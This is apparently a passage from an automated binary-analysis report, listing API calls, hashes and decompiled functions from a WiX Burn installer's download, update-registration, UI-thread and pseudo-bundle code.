                                                                                                                                                                  0x00425dfd
                                                                                                                                                                  0x00425e1b
                                                                                                                                                                  0x00425e20
                                                                                                                                                                  0x00425e20
                                                                                                                                                                  0x00425d8b
                                                                                                                                                                  0x00425d94
                                                                                                                                                                  0x00425d99
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425ce3
                                                                                                                                                                  0x00425ce3
                                                                                                                                                                  0x00425cf4
                                                                                                                                                                  0x00425cfe
                                                                                                                                                                  0x00425d0c
                                                                                                                                                                  0x00425d11
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425d11
                                                                                                                                                                  0x00425cba
                                                                                                                                                                  0x00425cba
                                                                                                                                                                  0x00425cbf
                                                                                                                                                                  0x00425cbf
                                                                                                                                                                  0x00425cc0
                                                                                                                                                                  0x00425e26
                                                                                                                                                                  0x00425e26
                                                                                                                                                                  0x00425e2b
                                                                                                                                                                  0x00425e2e
                                                                                                                                                                  0x00425e2e
                                                                                                                                                                  0x00425e35
                                                                                                                                                                  0x00425e38
                                                                                                                                                                  0x00425e38
                                                                                                                                                                  0x00425e42
                                                                                                                                                                  0x00425e47
                                                                                                                                                                  0x00425e47
                                                                                                                                                                  0x00425e52
                                                                                                                                                                  0x00425e52

                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetOpenW.WININET(Burn,00000000,00000000,00000000,00000000), ref: 00425CD7
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00425CE3
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00425E38
                                                                                                                                                                    • Part of subcall function 0043856B: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,00000000,75C08550), ref: 004385C2
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000002,?,00000004), ref: 00425D4C
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 00425D57
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00425D62
                                                                                                                                                                    • Part of subcall function 0042515A: CreateFileW.KERNEL32(?,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,75C08550,?,000000FF,?,?,?,00000078), ref: 00425199
                                                                                                                                                                    • Part of subcall function 0042515A: GetLastError.KERNEL32 ref: 004251A7
                                                                                                                                                                    • Part of subcall function 0042515A: VirtualFree.KERNEL32(?,00000000,00008000), ref: 004253D8
                                                                                                                                                                    • Part of subcall function 0042515A: CloseHandle.KERNEL32(?), ref: 004253E7
                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000078,00000000,00000000,?,?,?,?,?,?,?,?,00000078,000000FF), ref: 00425E11
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,00000078,00000000,00000000,?,?,?,?,?,?,?,?,00000078,000000FF), ref: 00425E20
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$Close$HandleOption$ErrorFileLast$CreateDeleteFreeOpenVirtual
                                                                                                                                                                  • String ID: Burn$DownloadTimeout$Failed to copy download source URL.$Failed to download URL: %ls$Failed to get size and time for URL: %ls$Failed to open internet session$WiX\Burn$downloadengine.cpp
                                                                                                                                                                  • API String ID: 328221957-1870125225
                                                                                                                                                                  • Opcode ID: 5b1741da1c1baee1d5113628df0ab2f95a4bc62327bb113644b8d84af0cb052d
                                                                                                                                                                  • Instruction ID: c9df0415d024d7b871bdeb6b7c30a49cd011a8e9d64cffb30f5f8f0ae6371ed4
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b1741da1c1baee1d5113628df0ab2f95a4bc62327bb113644b8d84af0cb052d
                                                                                                                                                                  • Instruction Fuzzy Hash: 96514072E00629BBDF129FA1DC45EEF7BB9EF08710F114156FA04F6190E7398A119BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                                                  			E0040A3B1(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				intOrPtr _t58;
                                                                                                                                                                  				char* _t59;
                                                                                                                                                                  				void* _t63;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  
                                                                                                                                                                  				_t54 = __ecx;
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_t58 = _a4;
                                                                                                                                                                  				_t63 = E00409935(__ecx, _t58,  &_v12);
                                                                                                                                                                  				if(_t63 >= 0) {
                                                                                                                                                                  					_t63 = E00432129( *((intOrPtr*)(_t58 + 0x4c)), _v12, 0x20006,  &_v8);
                                                                                                                                                                  					if(_t63 >= 0) {
                                                                                                                                                                  						if(E00432A16(__ecx, _v8, L"ThisVersionInstalled", "Y") >= 0) {
                                                                                                                                                                  							if(E00432A16(__ecx, _v8, L"PackageName",  *((intOrPtr*)(_t58 + 0x60))) >= 0) {
                                                                                                                                                                  								if(E00432A16(_t54, _v8, L"PackageVersion",  *((intOrPtr*)(_t58 + 0x64))) >= 0) {
                                                                                                                                                                  									if(E00432A16(_t54, _v8, L"Publisher",  *((intOrPtr*)(_t58 + 0x68))) >= 0) {
                                                                                                                                                                  										_t40 =  *((intOrPtr*)(_t58 + 0xa4));
                                                                                                                                                                  										if( *((intOrPtr*)(_t58 + 0xa4)) == 0) {
                                                                                                                                                                  											L16:
                                                                                                                                                                  											_t59 = L"ReleaseType";
                                                                                                                                                                  											if(E00432A16(_t54, _v8, _t59,  *((intOrPtr*)(_t58 + 0xb0))) >= 0) {
                                                                                                                                                                  												_t60 = _a8;
                                                                                                                                                                  												if(E00409E7D(_t54, _v8, _a8, L"LogonUser", L"InstalledBy") >= 0) {
                                                                                                                                                                  													if(E00409E7D(_t54, _v8, _t60, L"Date", L"InstalledDate") >= 0) {
                                                                                                                                                                  														_t71 = E00409E7D(_t54, _v8, _t60, L"InstallerName", L"InstallerName");
                                                                                                                                                                  														if(_t71 >= 0) {
                                                                                                                                                                  															_t71 = E00409E7D(_t54, _v8, _t60, L"InstallerVersion", L"InstallerVersion");
                                                                                                                                                                  															if(_t71 < 0) {
                                                                                                                                                                  																_push(L"InstallerVersion");
                                                                                                                                                                  																goto L26;
                                                                                                                                                                  															}
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_push(L"InstallerName");
                                                                                                                                                                  															goto L26;
                                                                                                                                                                  														}
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_push(L"InstalledDate");
                                                                                                                                                                  														goto L26;
                                                                                                                                                                  													}
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_push(L"InstalledBy");
                                                                                                                                                                  													goto L26;
                                                                                                                                                                  												}
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_push(_t59);
                                                                                                                                                                  												goto L26;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t71 = E00432A16(_t54, _v8, L"PublishingGroup", _t40);
                                                                                                                                                                  											if(_t71 >= 0) {
                                                                                                                                                                  												goto L16;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_push(L"PublishingGroup");
                                                                                                                                                                  												goto L26;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_push(L"Publisher");
                                                                                                                                                                  										goto L26;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push(L"PackageVersion");
                                                                                                                                                                  									goto L26;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push(L"PackageName");
                                                                                                                                                                  								goto L26;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push(L"ThisVersionInstalled");
                                                                                                                                                                  							L26:
                                                                                                                                                                  							_push("Failed to write %ls value.");
                                                                                                                                                                  							_push(_t71);
                                                                                                                                                                  							E00430A57();
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to create the key for update registration.");
                                                                                                                                                                  						goto L4;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to get the formatted key path for update registration.");
                                                                                                                                                                  					L4:
                                                                                                                                                                  					_push(_t63);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					RegCloseKey(_v8);
                                                                                                                                                                  					_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					E004380AB(_v12);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t71;
                                                                                                                                                                  			}










                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,0040B25E,InstallerVersion,InstallerVersion,00000000,0040B25E,InstallerName,InstallerName,00000000,0040B25E,Date,InstalledDate,00000000,0040B25E,LogonUser), ref: 0040A55F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                                                                                                                  • API String ID: 3535843008-2703781546
                                                                                                                                                                  • Opcode ID: 27e501d1c470a84876b022b69e58a30ad4332b1f26f3dfda86ff1c574e0582dd
                                                                                                                                                                  • Instruction ID: 7f9aecffbb62b5309411c5e59361cf3eedd38465453835f14176d3c8c87c9085
                                                                                                                                                                  • Opcode Fuzzy Hash: 27e501d1c470a84876b022b69e58a30ad4332b1f26f3dfda86ff1c574e0582dd
                                                                                                                                                                  • Instruction Fuzzy Hash: D841F731E80735B7DB226651CD02F6E7964BF14B55F200177FA00B62E1D7BCAE60A68E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                  			E004175BE(void** _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				void _v12;
                                                                                                                                                                  				struct tagMSG _v40;
                                                                                                                                                                  				struct _WNDCLASSW _v80;
                                                                                                                                                                  				int _t35;
                                                                                                                                                                  				signed int _t36;
                                                                                                                                                                  				signed int _t37;
                                                                                                                                                                  				struct HWND__* _t44;
                                                                                                                                                                  				int _t47;
                                                                                                                                                                  				signed short _t57;
                                                                                                                                                                  				signed short _t60;
                                                                                                                                                                  				void** _t64;
                                                                                                                                                                  				signed int _t65;
                                                                                                                                                                  				void* _t75;
                                                                                                                                                                  				struct HWND__* _t77;
                                                                                                                                                                  
                                                                                                                                                                  				_t64 = _a4;
                                                                                                                                                                  				_t65 = 0xa;
                                                                                                                                                                  				_t35 = memset( &_v80, 0, _t65 << 2);
                                                                                                                                                                  				_push(7);
                                                                                                                                                                  				_t77 = 0;
                                                                                                                                                                  				_t36 = memset( &_v40, _t35, 0 << 2);
                                                                                                                                                                  				_t75 = _t64[2];
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t37 = _t36 & 0xffffff00 |  *((intOrPtr*)(_t75 + 0x458)) == 0x00000001;
                                                                                                                                                                  				_a4 = _t37;
                                                                                                                                                                  				if(_t37 == 0 || TlsSetValue( *(_t75 + 0x464),  *(_t75 + 0x47c)) != 0) {
                                                                                                                                                                  					_v80.hInstance = _t64[1];
                                                                                                                                                                  					_v80.lpfnWndProc = E00417759;
                                                                                                                                                                  					_v80.lpszClassName = L"WixBurnMessageWindow";
                                                                                                                                                                  					if(RegisterClassW( &_v80) != 0) {
                                                                                                                                                                  						_v12 = _a4;
                                                                                                                                                                  						_v8 = _t75 + 0xb8;
                                                                                                                                                                  						_t44 = CreateWindowExW(0x80, _v80.lpszClassName, _t77, 0x90000000, 0x80000000, 8, _t77, _t77, _t77, _t77, _t64[1],  &_v12);
                                                                                                                                                                  						if(_t44 != 0) {
                                                                                                                                                                  							 *(_t75 + 0x3a8) = _t44;
                                                                                                                                                                  							SetEvent( *_t64);
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								_t47 = GetMessageW( &_v40, _t77, _t77, _t77);
                                                                                                                                                                  								if(_t47 == 0) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								if(_t47 == 0xffffffff) {
                                                                                                                                                                  									_t77 = 0x8000ffff;
                                                                                                                                                                  									_push("Unexpected return value from message pump.");
                                                                                                                                                                  									L14:
                                                                                                                                                                  									_push(_t77);
                                                                                                                                                                  									E00430A57();
                                                                                                                                                                  									goto L15;
                                                                                                                                                                  								}
                                                                                                                                                                  								if(IsDialogMessageW(_v40,  &_v40) == 0) {
                                                                                                                                                                  									TranslateMessage( &_v40);
                                                                                                                                                                  									DispatchMessageW( &_v40);
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L15;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t57 = GetLastError();
                                                                                                                                                                  						_t80 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t77 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "uithread.cpp", 0x95, _t77);
                                                                                                                                                                  						_push("Failed to create window.");
                                                                                                                                                                  						goto L14;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t60 = GetLastError();
                                                                                                                                                                  					_t83 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t77 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "uithread.cpp", 0x8b, _t77);
                                                                                                                                                                  					_push("Failed to register window.");
                                                                                                                                                                  					goto L14;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t77 = 0x8007139f;
                                                                                                                                                                  					L15:
                                                                                                                                                                  					UnregisterClassW(L"WixBurnMessageWindow", _t64[1]);
                                                                                                                                                                  					return _t77;
                                                                                                                                                                  				}
                                                                                                                                                                  			}



















                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                                  • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                                  • API String ID: 213125376-288575659
                                                                                                                                                                  • Opcode ID: 101192c76667ab78136ccdce1f3c1589fdb4f89c6da2b2d96756db9211e1dc29
                                                                                                                                                                  • Instruction ID: 71478628fef37dba516660fcaa9bf678e508b9e4fe64fdba20abbeff673eea67
                                                                                                                                                                  • Opcode Fuzzy Hash: 101192c76667ab78136ccdce1f3c1589fdb4f89c6da2b2d96756db9211e1dc29
                                                                                                                                                                  • Instruction Fuzzy Hash: BE41B132A04615AFEB109BA5DC48BDABBB8FF08350F204126FA14E7190D735A941CBE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                  			E00422DE3(intOrPtr __ecx, void* __eflags, signed int _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				intOrPtr _t120;
                                                                                                                                                                  				intOrPtr _t175;
                                                                                                                                                                  				intOrPtr* _t189;
                                                                                                                                                                  				intOrPtr* _t196;
                                                                                                                                                                  				intOrPtr _t197;
                                                                                                                                                                  				intOrPtr _t202;
                                                                                                                                                                  				signed int _t205;
                                                                                                                                                                  				intOrPtr _t206;
                                                                                                                                                                  				intOrPtr _t207;
                                                                                                                                                                  				signed int _t208;
                                                                                                                                                                  				signed int _t209;
                                                                                                                                                                  				signed int _t211;
                                                                                                                                                                  				void* _t213;
                                                                                                                                                                  				void* _t219;
                                                                                                                                                                  				signed int _t222;
                                                                                                                                                                  				intOrPtr* _t223;
                                                                                                                                                                  				void* _t224;
                                                                                                                                                                  
                                                                                                                                                                  				_t192 = __ecx;
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_t189 = _a20;
                                                                                                                                                                  				_t120 = E00431078( *(_t189 + 0x80) << 3, 1);
                                                                                                                                                                  				_t211 = _a4;
                                                                                                                                                                  				 *((intOrPtr*)(_t211 + 0x7c)) = _t120;
                                                                                                                                                                  				if(_t120 != 0) {
                                                                                                                                                                  					_t205 = 0;
                                                                                                                                                                  					 *(_t211 + 0x80) =  *(_t189 + 0x80);
                                                                                                                                                                  					_a4 = 0;
                                                                                                                                                                  					if( *(_t189 + 0x80) <= 0) {
                                                                                                                                                                  						L14:
                                                                                                                                                                  						 *(_t211 + 0x14) =  *(_t211 + 0x14) & 0x00000000;
                                                                                                                                                                  						 *((intOrPtr*)(_t211 + 0xa4)) = 1;
                                                                                                                                                                  						 *((intOrPtr*)(_t211 + 0x8c)) =  *((intOrPtr*)(_t189 + 0x8c));
                                                                                                                                                                  						 *((intOrPtr*)(_t211 + 0x40)) =  *((intOrPtr*)(_t189 + 0x40));
                                                                                                                                                                  						 *((intOrPtr*)(_t211 + 0x44)) =  *((intOrPtr*)(_t189 + 0x44));
                                                                                                                                                                  						 *((intOrPtr*)(_t211 + 0x28)) =  *((intOrPtr*)(_t189 + 0x28));
                                                                                                                                                                  						 *((intOrPtr*)(_t211 + 0x2c)) =  *((intOrPtr*)(_t189 + 0x2c));
                                                                                                                                                                  						 *((intOrPtr*)(_t211 + 0x30)) =  *((intOrPtr*)(_t189 + 0x30));
                                                                                                                                                                  						 *((intOrPtr*)(_t211 + 0x34)) =  *((intOrPtr*)(_t189 + 0x34));
                                                                                                                                                                  						 *((intOrPtr*)(_t211 + 0x1c)) =  *((intOrPtr*)(_t189 + 0x1c));
                                                                                                                                                                  						if(E00433F88(_t211,  *_t189, 0) >= 0) {
                                                                                                                                                                  							_t97 = _t211 + 0x24; // 0x2cc
                                                                                                                                                                  							if(E00433F88(_t97,  *((intOrPtr*)(_t189 + 0x24)), 0) >= 0) {
                                                                                                                                                                  								 *((intOrPtr*)(_t211 + 0xac)) =  *((intOrPtr*)(_t189 + 0xac));
                                                                                                                                                                  								if(E00411C05(_t192,  &_v8,  *_a8,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(_a8 + 8)),  *((intOrPtr*)(_a8 + 0x1c)), 1, _a16, _a12,  *((intOrPtr*)(_t134 + 0xc))) >= 0) {
                                                                                                                                                                  									_t109 = _t211 + 0x94; // 0x33c
                                                                                                                                                                  									if(E00433F88(_t109, _v8, 0) >= 0) {
                                                                                                                                                                  										_t111 = _t211 + 0x98; // 0x340
                                                                                                                                                                  										_t219 = E00433F88(_t111, _v8, 0);
                                                                                                                                                                  										if(_t219 >= 0) {
                                                                                                                                                                  											_t113 = _t211 + 0x9c; // 0x344
                                                                                                                                                                  											 *((intOrPtr*)(_t211 + 0xa8)) = 1;
                                                                                                                                                                  											_t219 = E00433F88(_t113, _v8, 0);
                                                                                                                                                                  											if(_t219 >= 0) {
                                                                                                                                                                  												 *((intOrPtr*)(_t211 + 0x18)) = 1;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_push("Failed to copy uninstall arguments for passthrough bundle package");
                                                                                                                                                                  												goto L33;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_push("Failed to copy related arguments for passthrough bundle package");
                                                                                                                                                                  											goto L33;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_push("Failed to copy install arguments for passthrough bundle package");
                                                                                                                                                                  										goto L33;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push("Failed to recreate command-line arguments.");
                                                                                                                                                                  									goto L33;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to copy cache id for passthrough pseudo bundle.");
                                                                                                                                                                  								goto L33;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push("Failed to copy key for passthrough pseudo bundle.");
                                                                                                                                                                  							goto L33;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							_t222 = _t205 << 3;
                                                                                                                                                                  							_a20 =  *((intOrPtr*)(_t189 + 0x7c)) + _t222;
                                                                                                                                                                  							 *((intOrPtr*)(_t222 +  *((intOrPtr*)(_t211 + 0x7c)))) = E00431078(0x58, 1);
                                                                                                                                                                  							_t149 =  *((intOrPtr*)(_t211 + 0x7c));
                                                                                                                                                                  							_t206 =  *((intOrPtr*)(_t222 +  *((intOrPtr*)(_t211 + 0x7c))));
                                                                                                                                                                  							if(_t206 == 0) {
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t196 = _a20;
                                                                                                                                                                  							 *((intOrPtr*)(_t206 + 4)) =  *((intOrPtr*)( *_t196 + 4));
                                                                                                                                                                  							_t197 =  *_t196;
                                                                                                                                                                  							_t207 =  *((intOrPtr*)(_t222 +  *((intOrPtr*)(_t211 + 0x7c))));
                                                                                                                                                                  							 *((intOrPtr*)(_t207 + 0x10)) =  *((intOrPtr*)(_t197 + 0x10));
                                                                                                                                                                  							 *((intOrPtr*)(_t207 + 0x14)) =  *((intOrPtr*)(_t197 + 0x14));
                                                                                                                                                                  							_t219 = E00433F88( *((intOrPtr*)(_t222 +  *((intOrPtr*)(_t211 + 0x7c)))),  *((intOrPtr*)( *_a20)), 0);
                                                                                                                                                                  							if(_t219 < 0) {
                                                                                                                                                                  								_push("Failed to copy key for passthrough pseudo bundle payload.");
                                                                                                                                                                  								goto L33;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t219 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _a4 * 8)) + 0x18,  *((intOrPtr*)( *_a20 + 0x18)), 0);
                                                                                                                                                                  								if(_t219 < 0) {
                                                                                                                                                                  									_push("Failed to copy filename for passthrough pseudo bundle.");
                                                                                                                                                                  									goto L33;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t219 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _a4 * 8)) + 0x38,  *((intOrPtr*)( *_a20 + 0x38)), 0);
                                                                                                                                                                  									if(_t219 < 0) {
                                                                                                                                                                  										_push("Failed to copy local source path for passthrough pseudo bundle.");
                                                                                                                                                                  										goto L33;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t223 = _a20;
                                                                                                                                                                  										_t172 =  *_t223;
                                                                                                                                                                  										if( *((intOrPtr*)( *_t223 + 0x40)) == 0) {
                                                                                                                                                                  											L10:
                                                                                                                                                                  											_t173 =  *_t223;
                                                                                                                                                                  											if( *((intOrPtr*)( *_t223 + 0x30)) == 0) {
                                                                                                                                                                  												L13:
                                                                                                                                                                  												_t208 = _a4;
                                                                                                                                                                  												_t192 =  *((intOrPtr*)(_t211 + 0x7c));
                                                                                                                                                                  												 *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + 4 + _t208 * 8)) =  *((intOrPtr*)(_t223 + 4));
                                                                                                                                                                  												_t205 = _t208 + 1;
                                                                                                                                                                  												_a4 = _t205;
                                                                                                                                                                  												if(_t205 <  *(_t189 + 0x80)) {
                                                                                                                                                                  													continue;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													goto L14;
                                                                                                                                                                  												}
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t175 = E00431078( *((intOrPtr*)(_t173 + 0x34)), 0);
                                                                                                                                                                  												_t209 = _a4;
                                                                                                                                                                  												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _t209 * 8)) + 0x30)) = _t175;
                                                                                                                                                                  												_t176 =  *((intOrPtr*)(_t211 + 0x7c));
                                                                                                                                                                  												_t202 =  *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _t209 * 8));
                                                                                                                                                                  												if( *((intOrPtr*)(_t202 + 0x30)) == 0) {
                                                                                                                                                                  													_t213 = 0x8007000e;
                                                                                                                                                                  													_t219 = 0x8007000e;
                                                                                                                                                                  													E004300D9(_t176, "pseudobundle.cpp", 0xcf, 0x8007000e);
                                                                                                                                                                  													_push("Failed to allocate memory for pseudo bundle payload hash.");
                                                                                                                                                                  													goto L18;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													 *((intOrPtr*)(_t202 + 0x34)) =  *((intOrPtr*)( *_t223 + 0x34));
                                                                                                                                                                  													E00426F91( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _t209 * 8)) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _t209 * 8)) + 0x34)),  *((intOrPtr*)( *_t223 + 0x30)),  *((intOrPtr*)( *_t223 + 0x34)));
                                                                                                                                                                  													_t224 = _t224 + 0x10;
                                                                                                                                                                  													goto L13;
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t219 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x7c)) + _a4 * 8)) + 0x40,  *((intOrPtr*)(_t172 + 0x40)), 0);
                                                                                                                                                                  											if(_t219 < 0) {
                                                                                                                                                                  												_push("Failed to copy download source for passthrough pseudo bundle.");
                                                                                                                                                                  												L33:
                                                                                                                                                                  												_push(_t219);
                                                                                                                                                                  												goto L34;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t223 = _a20;
                                                                                                                                                                  												goto L10;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L36;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t213 = 0x8007000e;
                                                                                                                                                                  						_t219 = 0x8007000e;
                                                                                                                                                                  						E004300D9(_t149, "pseudobundle.cpp", 0xb9, 0x8007000e);
                                                                                                                                                                  						_push("Failed to allocate space for burn payload inside of related bundle struct");
                                                                                                                                                                  						goto L18;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t213 = 0x8007000e;
                                                                                                                                                                  					_t219 = 0x8007000e;
                                                                                                                                                                  					E004300D9(_t120, "pseudobundle.cpp", 0xb1, 0x8007000e);
                                                                                                                                                                  					_push("Failed to allocate space for burn package payload inside of passthrough bundle.");
                                                                                                                                                                  					L18:
                                                                                                                                                                  					_push(_t213);
                                                                                                                                                                  					L34:
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				L36:
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t219;
                                                                                                                                                                  			}





















                                                                                                                                                                  0x00423110
                                                                                                                                                                  0x00423114
                                                                                                                                                                  0x00423125
                                                                                                                                                                  0x00423116
                                                                                                                                                                  0x00423116
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423116
